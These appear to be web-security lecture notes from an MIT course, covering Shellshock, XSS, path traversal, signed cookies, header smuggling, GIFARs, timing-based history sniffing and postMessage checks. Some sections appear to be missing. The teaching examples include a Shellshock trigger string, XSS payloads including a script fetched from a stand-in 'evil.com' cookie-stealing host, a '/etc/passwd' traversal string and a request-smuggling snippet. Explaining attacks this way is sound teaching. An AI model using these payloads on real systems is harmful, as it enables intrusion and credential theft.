MIT6 858F14 Lec9 PDF
6.858 Lecture 9
WEB SECURITY: Part II
Last lecture, we looked at a core security mechanism for the web: the same-origin
policy. In this lecture, we'll continue to look at how we can build secure web
applications.
The recent "Shell Shock" bug is a good example of how difficult it is to design
web services that compose multiple technologies.
• A web client can include extra headers in its HTTP requests, and determine
which query parameters are in a request. Ex:
o GET /query.cgi?searchTerm=cats HTTP/1.1
o Host: www.example.com
o Custom-header: Custom-value
• CGI servers map the various components of the HTTP request to Unix environment
variables.
• Vulnerability: Bash has a parsing bug in the way that it handles the setting of
environment variables! If a string begins with a certain set of malformed bytes,
bash will continue to parse the rest of the string and execute any commands that
it finds! For example, setting an environment variable to a value like this…
() { :;}; /bin/id
• …will confuse the bash parser, and cause it to execute the /bin/id command
(which displays the UID and GID information for the current user).
• Live demo
o Step 1: Run the CGI server.
§ ./victimwebserver.py 8082
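A minimal sketch of the header-to-environment mapping described above, assuming the usual CGI convention of an "HTTP_" prefix on header names. The function name cgi_environment is made up for illustration. No shell is launched here. The point is only that an attacker-chosen header value reaches an environment variable unchanged.

```python
def cgi_environment(request_line, headers):
    """Build CGI-style environment variables from a parsed HTTP request.

    Assumed convention: header "Some-Name" becomes variable "HTTP_SOME_NAME",
    and the query string becomes QUERY_STRING.
    """
    method, target, _version = request_line.split(" ")
    path, _, query = target.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
    }
    for name, value in headers.items():
        # The value is copied verbatim; nothing inspects or sanitizes it.
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


# The client controls header values, so the trigger string from the notes
# ends up inside an environment variable before any shell is started.
env = cgi_environment(
    "GET /query.cgi?searchTerm=cats HTTP/1.1",
    {"Host": "www.example.com", "Custom-header": "() { :;}; /bin/id"},
)
print(env["HTTP_CUSTOM_HEADER"])
```

If the CGI server then starts a vulnerable bash with this environment, bash parses the variable and runs the trailing command.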
Shell Shock is a particular instance of security bugs which arise from improper
content sanitization. Another type of content sanitization failure occurs during
cross-site scripting (XSS) attacks.
Example: Suppose that a CGI script embeds a query string parameter in the HTML
that it generates.
Demo:
• Step 1: Run the CGI server.
o ./cgiServer.py
• Step 2: In browser, load these URLs:
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=hello
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=<b>hello</b>
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=<script>alert("XSS");</script>
http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
//malformed HTML.
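The source of uploadRecv.py isn't shown in these notes, so the following is only a guess at the kind of handler the demo exercises: a hypothetical render_page() that pastes the "msg" parameter into HTML without escaping it. The payloads are percent-encoded here so that the query parser sees them as a single parameter.

```python
from urllib.parse import parse_qs, quote, urlsplit


def render_page(url):
    """Hypothetical stand-in for uploadRecv.py: echoes ?msg= into the page."""
    query = parse_qs(urlsplit(url).query)
    msg = query.get("msg", [""])[0]
    # BUG (intentional): attacker-controlled text is inserted without escaping.
    return "<html><body>Message: " + msg + "</body></html>"


base = "http://127.0.0.1:8282/cgi-bin/uploadRecv.py?msg="
for payload in ["hello", "<b>hello</b>", '<script>alert("XSS");</script>']:
    print(render_page(base + quote(payload)))
```

The third page contains a live script element, so a browser without an XSS filter would execute it in the origin of the server.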
XSS defenses
• Chrome and IE have a built-in feature which uses heuristics to detect potential
cross-site scripting attacks.
o Ex: Is a script which is about to execute included in the request that fetched
the enclosing page?
§ http://foo.com?q=<script src="evil.com/cookieSteal.js"/>
o If so, this is strong evidence that something suspicious is about to happen!
The attack above is called a "reflected XSS attack," because the server
"reflects" or "returns" the attacker-supplied code to the user's browser,
executing it in the context of the victim page.
§ This is why our first XSS attack in the CGI example didn't work: the browser
detected reflected JavaScript in the URL, and removed the trailing </script>
before it even reached the CGI server.
§ However . . .
o Filters don't have 100% coverage, because there are a huge number of ways to
encode an XSS attack!
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
§ This is why our second XSS attack succeeded: the browser got confused by our
intentionally malformed HTML.
o Problem: Filters can't catch persistent XSS attacks in which the server saves
attacker-provided data, which is then permanently distributed to clients.
§ Classic example: A "comments" section which allows users to post HTML messages.
§ Another example: Suppose that a dating site allows users to include HTML in
their profiles. An attacker can add HTML that will run in a *different* user's
browser when that user looks at the attacker's profile! Attacker could steal the
user's cookie.
• Another XSS defense: "httponly" cookies.
o A server can tell a browser that client-side JavaScript should not be able to
access a cookie. [The server does this by adding the "Httponly" token to a
"Set-cookie" HTTP response value.]
o This is only a partial defense, since the attacker can still issue requests
that contain a user's cookies (CSRF).
• Privilege separation: Use a separate domain for untrusted content.
o For example, Google stores untrusted content in googleusercontent.com
(e.g., cached copies of pages, Gmail attachments).
o Even if XSS is possible in the untrusted content, the attacker code will run in
a different origin.
o There may still be problems if the content in googleusercontent.com
points to URLs in google.com.
• Content sanitization: Take untrusted content and encode it in a way that
constrains how it can be interpreted.
o Ex: Django templates: Define an output page as a bunch of HTML that has some
"holes" where external content can be inserted.
[https://docs.djangoproject.com/en/dev/topics/templates/#automatic-html-escaping]
o A template might contain code like this…
§ <b>Hello {{ name }} </b>
o … where "name" is a variable that is resolved when the page is processed by the
Django template engine. That engine will take the value of "name" (e.g., from a
user-supplied HTTP query string), and then automatically escape dangerous
characters. For example:
§ angle brackets < and > --> &lt; and &gt;
§ double quotes " --> &quot;
o This prevents untrusted content from injecting HTML into the rendered page.
o Templates cannot defend against all attacks! For example . . .
§ <div class={{ var }}>...</div>
• Content Security Policy (CSP): Allows a web server to tell the browser which
kinds of resources can be loaded, and the allowable origins for those resources.
o Server specifies one or more headers of the type "Content-Security-Policy".
o Example:
§ Content-Security-Policy: default-src 'self' *.mydomain.com
• Only allow content from the page's domain and its subdomains.
o You can specify separate policies for where images can come from, where
scripts can come from, frames, plugins, etc.
o CSP also prevents inline JavaScript, and JavaScript interfaces like eval()
which allow for dynamic JavaScript generation.
• Some browsers allow servers to disable content-type sniffing
(X-Content-Type-Options: nosniff).
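To make the content-sanitization bullet concrete, here is a small sketch that uses Python's standard html.escape() as a stand-in for template auto-escaping (it is not Django's engine, and the two render_* helpers are hypothetical). It shows escaping working in a text position and failing in the unquoted-attribute case from the notes.

```python
import html


def render_greeting(name):
    """Escape untrusted text before placing it in an HTML text node."""
    return "<b>Hello " + html.escape(name) + "</b>"


def render_div_unquoted(css_class):
    """Same escaping, but inside an unquoted attribute value."""
    return "<div class=" + html.escape(css_class) + ">...</div>"


# Angle brackets and quotes are rewritten, so no script element is created.
print(render_greeting('<script>alert("XSS")</script>'))

# Spaces and "=" are not escaped, so the value adds a second attribute.
print(render_div_unquoted("x onmouseover=alert(1)"))
```

The second output is a div with an attacker-chosen event handler, even though every "dangerous" character was escaped. Quoting the attribute in the template (class="...") is what closes this particular hole.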
You can also run into problems if untrusted entities can supply filenames.
• Ex: Suppose that a web server reads files based on user-supplied parameters.
o open("/www/images/" + filename)
• Problem: filename might look like this:
o ../../../../../etc/passwd
• As with SQL injection, the server must sanitize the user input: the server must
reject file names with slashes, or encode the slashes in some way.
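One possible shape for that check, as a sketch rather than a vetted implementation: reject names that contain path separators (as suggested above), then canonicalize and confirm the result still lives under the image directory. The helper name resolve_image_path is made up, and POSIX-style paths are assumed.

```python
import os

IMAGE_ROOT = "/www/images"  # directory from the open() example above


def resolve_image_path(filename, root=IMAGE_ROOT):
    """Return a path under root for filename, or raise ValueError."""
    # Reject separators outright, plus names with special meaning.
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        raise ValueError("unsafe file name: %r" % filename)
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, filename))
    # Defense in depth: after resolving symlinks, still require containment.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes %s: %r" % (root, filename))
    return candidate


for name in ["cat.jpg", "../../../../../etc/passwd"]:
    try:
        print(name, "->", resolve_image_path(name))
    except ValueError as err:
        print(name, "-> rejected:", err)
```

The server would call open() only on the returned path, never on the raw concatenation.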
o A "web framework" is a software system that provides infrastructure for tasks
like database accesses, session management, and the creation of templated
content that can be used throughout a site.
o Other frameworks are more popular: PHP, Ruby on Rails.
o In the enterprise world, Java servlets and ASP are also widely used.
• Django developers have put some amount of thought into security.
o So, Django is a good case study to see how people implement web security in
practice.
• Django is probably better in terms of security than some of the alternatives
like PHP or Ruby on Rails, but the devil is in the details.
o As we'll discuss two lectures from now, researchers have invented some
frameworks that offer provably better security.
§ [Ur/Web: http://www.impredicative.com/ur/]
Stateless cookies
• If you don't have the notion of a session, then you need to authenticate every
request!
o Idea: Authenticate the cookie using cryptography.
o Primitive: Message authentication codes (MACs)
§ Think of it like a keyed hash, e.g., HMAC-SHA1: H(k, m)
§ Client and server share a key; the client uses the key to produce a MAC over
the message, and the server uses the key to verify that MAC.
o AWS S3 REST Services use this kind of cookie
[http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html].
§ Amazon gives each developer an AWS Access Key ID, and an AWS secret key. Each
request looks like this:
GET /photos/cat.jpg HTTP/1.1
Host: johndoe.s3.amazonaws.com
Authorization: AWS AKIAIOSFODNN7EXAMPLE:frJIUN8DYpKDtOLCwoyllqDzg=
                   |__________________| |________________________|
                   Access key ID        Signature (MAC)
§ Here's what is signed (this is slightly simplified, see the link above for the
full story):
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
ResourceName
o Note that this kind of cookie doesn't expire in the traditional sense (although
the server will reject the request if Amazon has revoked the user's key).
§ You can embed an "expiration" field in a *particular* request, and then hand
that URL to a third party, such that, if the third party waits too long, AWS will
reject the request as expired.
AWSAccessKeyId=AKIAIOSFODNN7EXAMPLE&Expires=1141889120&Signature=vjbyPxybd...
                                    |________________|
                                    Included in the signature!
o Note that the format for the string-to-hash should provide unambiguous parsing!
§ Ex: No component should be allowed to embed the escape character, otherwise the
server-side parser may get confused.
• Q: How do you log out with this kind of cookie design?
• A: Impossible, if the server is stateless (closing a session would require a
server-side table of revoked cookies).
• If server can be stateful, session IDs make this much simpler.
• There's a fundamental trade-off between reducing server-side memory state and
increasing server-side computation overhead for cryptography.
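A minimal sketch of a MAC-protected stateless cookie, using only the Python standard library. Several things here are assumptions, not taken from the notes or from AWS: the "user|expires|mac" layout, the demo key, the function names, and the use of HMAC-SHA256 in place of the HMAC-SHA1 mentioned above. Unlike the AWS scheme, only the server holds the key in this variant.

```python
import hashlib
import hmac
import time

SERVER_KEY = b"demo-key-not-for-production"  # hypothetical secret


def _mac(payload):
    """Keyed hash H(k, m) over the cookie payload."""
    return hmac.new(SERVER_KEY, payload.encode("utf-8"), hashlib.sha256).hexdigest()


def make_cookie(user, expires_at):
    """Return "user|expires|mac"; '|' is banned in user to keep parsing unambiguous."""
    if "|" in user:
        raise ValueError("delimiter not allowed in user name")
    payload = "%s|%d" % (user, expires_at)
    return payload + "|" + _mac(payload)


def verify_cookie(cookie, now=None):
    """Return the user name if the MAC is valid and unexpired, else None."""
    now = time.time() if now is None else now
    try:
        user, expires, mac = cookie.split("|")
        expires_at = int(expires)
    except ValueError:
        return None  # wrong number of fields or non-numeric expiry
    expected = _mac(user + "|" + expires)
    # Constant-time comparison avoids leaking how many characters matched.
    if not hmac.compare_digest(mac.encode("utf-8"), expected.encode("utf-8")):
        return None
    return user if now < expires_at else None


cookie = make_cookie("alice", int(time.time()) + 3600)
print(verify_cookie(cookie))
print(verify_cookie(cookie.replace("alice", "admin")))
```

The server keeps no per-user table, which is also why logout is hard: a cookie stays valid until its embedded expiry passes or the key changes.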
o Benefit: The cookie is not sent over the network to the server.
o Benefit: Your authentication scheme is not subject to complex same-origin
policy for cookies (e.g., DOM storage is bound to a single origin, unlike a
cookie, which can be bound to multiple subdomains).
• Client-side X.509 certificates.
o Benefit: Web applications can't steal or explicitly manipulate each other's
certificates.
o Drawback: Have weak story for revocation (we'll talk about this more in future
lectures).
o Drawback: Poor usability: users don't want to manage a certificate for each
site that they visit!
o Benefit/drawback: There isn't a notion of a session, since the certificate is
"always on." For important operations, the application will have to prompt for a
password.
The web stack has some protocol ambiguities that can lead to security holes.
• HTTP header injection from XMLHttpRequests
o JavaScript can ask the browser to add extra headers in the request. So, what
happens if we do this?
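var x = new XMLHttpRequest();  // declaration added so the snippet stands alone
x.open("GET", "http://foo.com");
// Overrides the browser-computed field! "7" is the length of "Gotcha!".
x.setRequestHeader("Content-Length", "7");
x.send("Gotcha!\r\n" +
"GET /something.html HTTP/1.1\r\n" +
"Host: bar.com");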
o The server at foo.com may interpret this as two separate requests! Later, when
the browser receives the response to the second request, it may overwrite a cache
entry belonging to bar.com with content from foo.com!
o Solution: Prevent XMLHttpRequests from setting sensitive fields like "Host:" or
"Content-Length".
o Takehome point: Unambiguous encoding is critical! Build reliable
escaping/encoding!
• URL parsing ("The Tangled Web" page 154)
o Flash had a slightly different URL parser than the browser.
o Suppose the URL was http://example.com:[email protected]/
§ Flash would compute the origin as "example.com".
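To illustrate how two parsers can disagree about a URL of this shape, here is a sketch. The URL below is an illustrative one chosen for this example (not taken from the notes), and naive_host() is a hypothetical buggy parser, not Flash's actual code. Python's urlsplit() plays the role of the standards-following parser.

```python
from urllib.parse import urlsplit


def naive_host(url):
    """Hypothetical buggy parser: host = text between '://' and the first ':' or '/'."""
    rest = url.split("://", 1)[1]
    for i, ch in enumerate(rest):
        if ch in ":/":
            return rest[:i]
    return rest


# Illustrative URL: everything before "@" is user info, not the host.
url = "http://example.com:80@foo.example/"

print(naive_host(url))         # what the buggy parser believes the host is
print(urlsplit(url).hostname)  # the host a URL-spec-following parser connects to
```

Any security decision keyed on the first answer (e.g., an origin check) is then applied to content that actually comes from the second host.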
o Leverage the fact that image renderers process a file top-down, whereas
decompressors for .zip files typically start from the end and go upwards.
o Attackers realized that .jar files are based on the .zip format!
o THUS THE GIFAR WAS BORN: half-gif, half-jar, all-evil.
§ Really simple to make a GIFAR: Just use "cat" on Linux or "copy /b" on Windows.
§ Suppose that target.com only allows external parties to upload image objects.
The attacker can upload a GIFAR, and the GIFAR will pass target.com's image
validation tests!
§ Then, if the attacker can launch an XSS attack, the attacker can inject HTML
which refers to the ".gif" as an applet.
<applet code="attacker.class" archive="attacker.gif" ..>
§ The browser will load that applet and give it the authority of target.com!
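The top-down versus bottom-up parsing difference can be reproduced with Python's zipfile module, which (like other ZIP readers) locates the archive directory from the end of the file. This is a sketch under simplifying assumptions: the "GIF" is just the magic number plus padding, the class file is placeholder bytes, and looks_like_gif() is a hypothetical upload check.

```python
import io
import zipfile

# A few bytes that start like a GIF (magic number only; not a full image).
gif_bytes = b"GIF89a" + b"\x00" * 16

# Build a small ZIP archive in memory (a .jar is a ZIP with extra metadata).
jar_buffer = io.BytesIO()
with zipfile.ZipFile(jar_buffer, "w") as jar:
    jar.writestr("attacker.class", b"placeholder bytes, not real bytecode")

# Equivalent of concatenating the two files with "cat".
gifar = gif_bytes + jar_buffer.getvalue()


def looks_like_gif(data):
    """Hypothetical upload check that only inspects the leading magic bytes."""
    return data[:6] in (b"GIF87a", b"GIF89a")


print(looks_like_gif(gifar))
with zipfile.ZipFile(io.BytesIO(gifar)) as archive:
    print(archive.namelist())
```

The same bytes pass as an image when read from the front and as an archive when read from the back, which is all a GIFAR needs.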
o This attack can reveal your location if the candidate images are geographically
specific, e.g., Google Map tiles.
§ http://w2spconf.com/2014/papers/geo_inference.pdf
o Fix: No good ones. A page could never cache objects, but this will hurt
performance. But suppose that a site doesn't cache anything. Is it safe from
history sniffing? No!
• Example #3: DNS-‐based attacks
o Attacker setup and goal are the same as before.
o Exploit vector: Attacker page generates references to objects in various
domains. If the user has already accessed objects from that domain, the
hostnames will already reside in the DNS cache, making subsequent object accesses
faster!
§ http://sip.cs.princeton.edu/pub/webtiming.pdf
o Fix: No good ones. Could use raw IP addresses for links, but this breaks a lot
of things (e.g. DNS-based load balancing). However, suppose that a site doesn't
cache anything and uses raw IP addresses for hostnames. Is it safe from history
sniffing? No!
• Example #4: Rendering attacks.
o Attacker setup and goal are the same as before.
o Exploit vector: Attacker page loads a candidate URL in an iframe. Before the
browser has fetched the content, the attacker page can access…
window.frames[1].location.href
o …and read the value that the attacker set. However, once the browser has
fetched the content, accessing that reference will return "undefined" due to the
same-origin policy. So, the attacker can poll the value and see how long it takes
to turn "undefined". If it takes a long time, the page must not have been cached!
§ http://lcamtuf.coredump.cx/cachetime/firefox.html
o Fix: Stop using computers.
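The cache, DNS, and rendering attacks above share one pattern: time an operation and compare it against a threshold. Here is a deterministic toy simulation of that inference. Nothing in it touches a real browser or network: the latency constants, the SimulatedBrowser class, and the threshold are all assumptions made up for illustration.

```python
CACHED_LATENCY_MS = 5      # assumed cost of a cache hit
NETWORK_LATENCY_MS = 120   # assumed cost of a network fetch


class SimulatedBrowser:
    """Toy model of a browser cache; latencies are assumed constants."""

    def __init__(self, visited_urls):
        self._cache = set(visited_urls)

    def load_time_ms(self, url):
        """Return how long the embedding page observes the load taking."""
        if url in self._cache:
            return CACHED_LATENCY_MS
        self._cache.add(url)  # probing pollutes the cache, as in a real attack
        return NETWORK_LATENCY_MS


def sniff_history(browser, candidate_urls, threshold_ms=50):
    """Attacker logic: a fast load implies the URL was already cached."""
    return [u for u in candidate_urls if browser.load_time_ms(u) < threshold_ms]


victim = SimulatedBrowser({"http://bank.example/logo.png"})
candidates = ["http://bank.example/logo.png", "http://other.example/logo.png"]
print(sniff_history(victim, candidates))
```

Note that each probe can only be trusted once, since the probe itself warms the cache. Real measurements are also noisy, so an actual attack needs repeated trials and a calibrated threshold.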
o Receiver defines an event handler
for the special "message" event. The
event handler receives the msg and the origin.
• Q: Why does the receiver have to check the origin of received message?
• A: To perform access control on senders! If the receiver implements sensitive
functionality, it shouldn't respond to requests from arbitrary origins.
o Common mistake: The receiver uses regular expressions to check the sender's
origin.
o Even if origin matches /.foo.com/, doesn't mean it's from foo.com! Could
be "xfoo.com", or "www.foo.com.bar.com".
o More details: https://www.cs.utexas.edu/~shmat/shmat_ndss13postman.pdf
• Q: Why does the sender have to specify the intended origin of the receiver?
• A: postMessage() is applied to a window, not an origin.
o Remember that an attacker may be able to navigate a window to a
different location.
o If the attacker navigates the window, another origin may receive
message!
o If the sender explicitly specifies a target origin, the browser checks
recipient origin before delivering the msg.
o More details: http://css.csail.mit.edu/6.858/2013/readings/post-message.pdf
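The regular-expression pitfall in the receiver's origin check is easy to reproduce outside a browser. The sketch below uses Python's re module with the same pattern as in the notes. The allowlist contents and both function names are hypothetical.

```python
import re

ALLOWED_ORIGINS = {"https://foo.com", "https://www.foo.com"}  # hypothetical allowlist


def regex_check(origin):
    """The common mistake: an unanchored pattern with unescaped dots."""
    return re.search(r".foo.com", origin) is not None


def exact_check(origin):
    """Compare the whole origin string against an explicit allowlist."""
    return origin in ALLOWED_ORIGINS


for origin in ["https://www.foo.com", "https://xfoo.com", "https://www.foo.com.bar.com"]:
    print(origin, regex_check(origin), exact_check(origin))
```

The regex accepts all three origins, because "." matches any character and nothing anchors the match to the end of the string. The exact comparison accepts only the first.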
MIT OpenCourseWare
http://ocw.mit.edu
For information about citing these materials or our Terms of Use, visit: http://ocw.mit.edu/terms.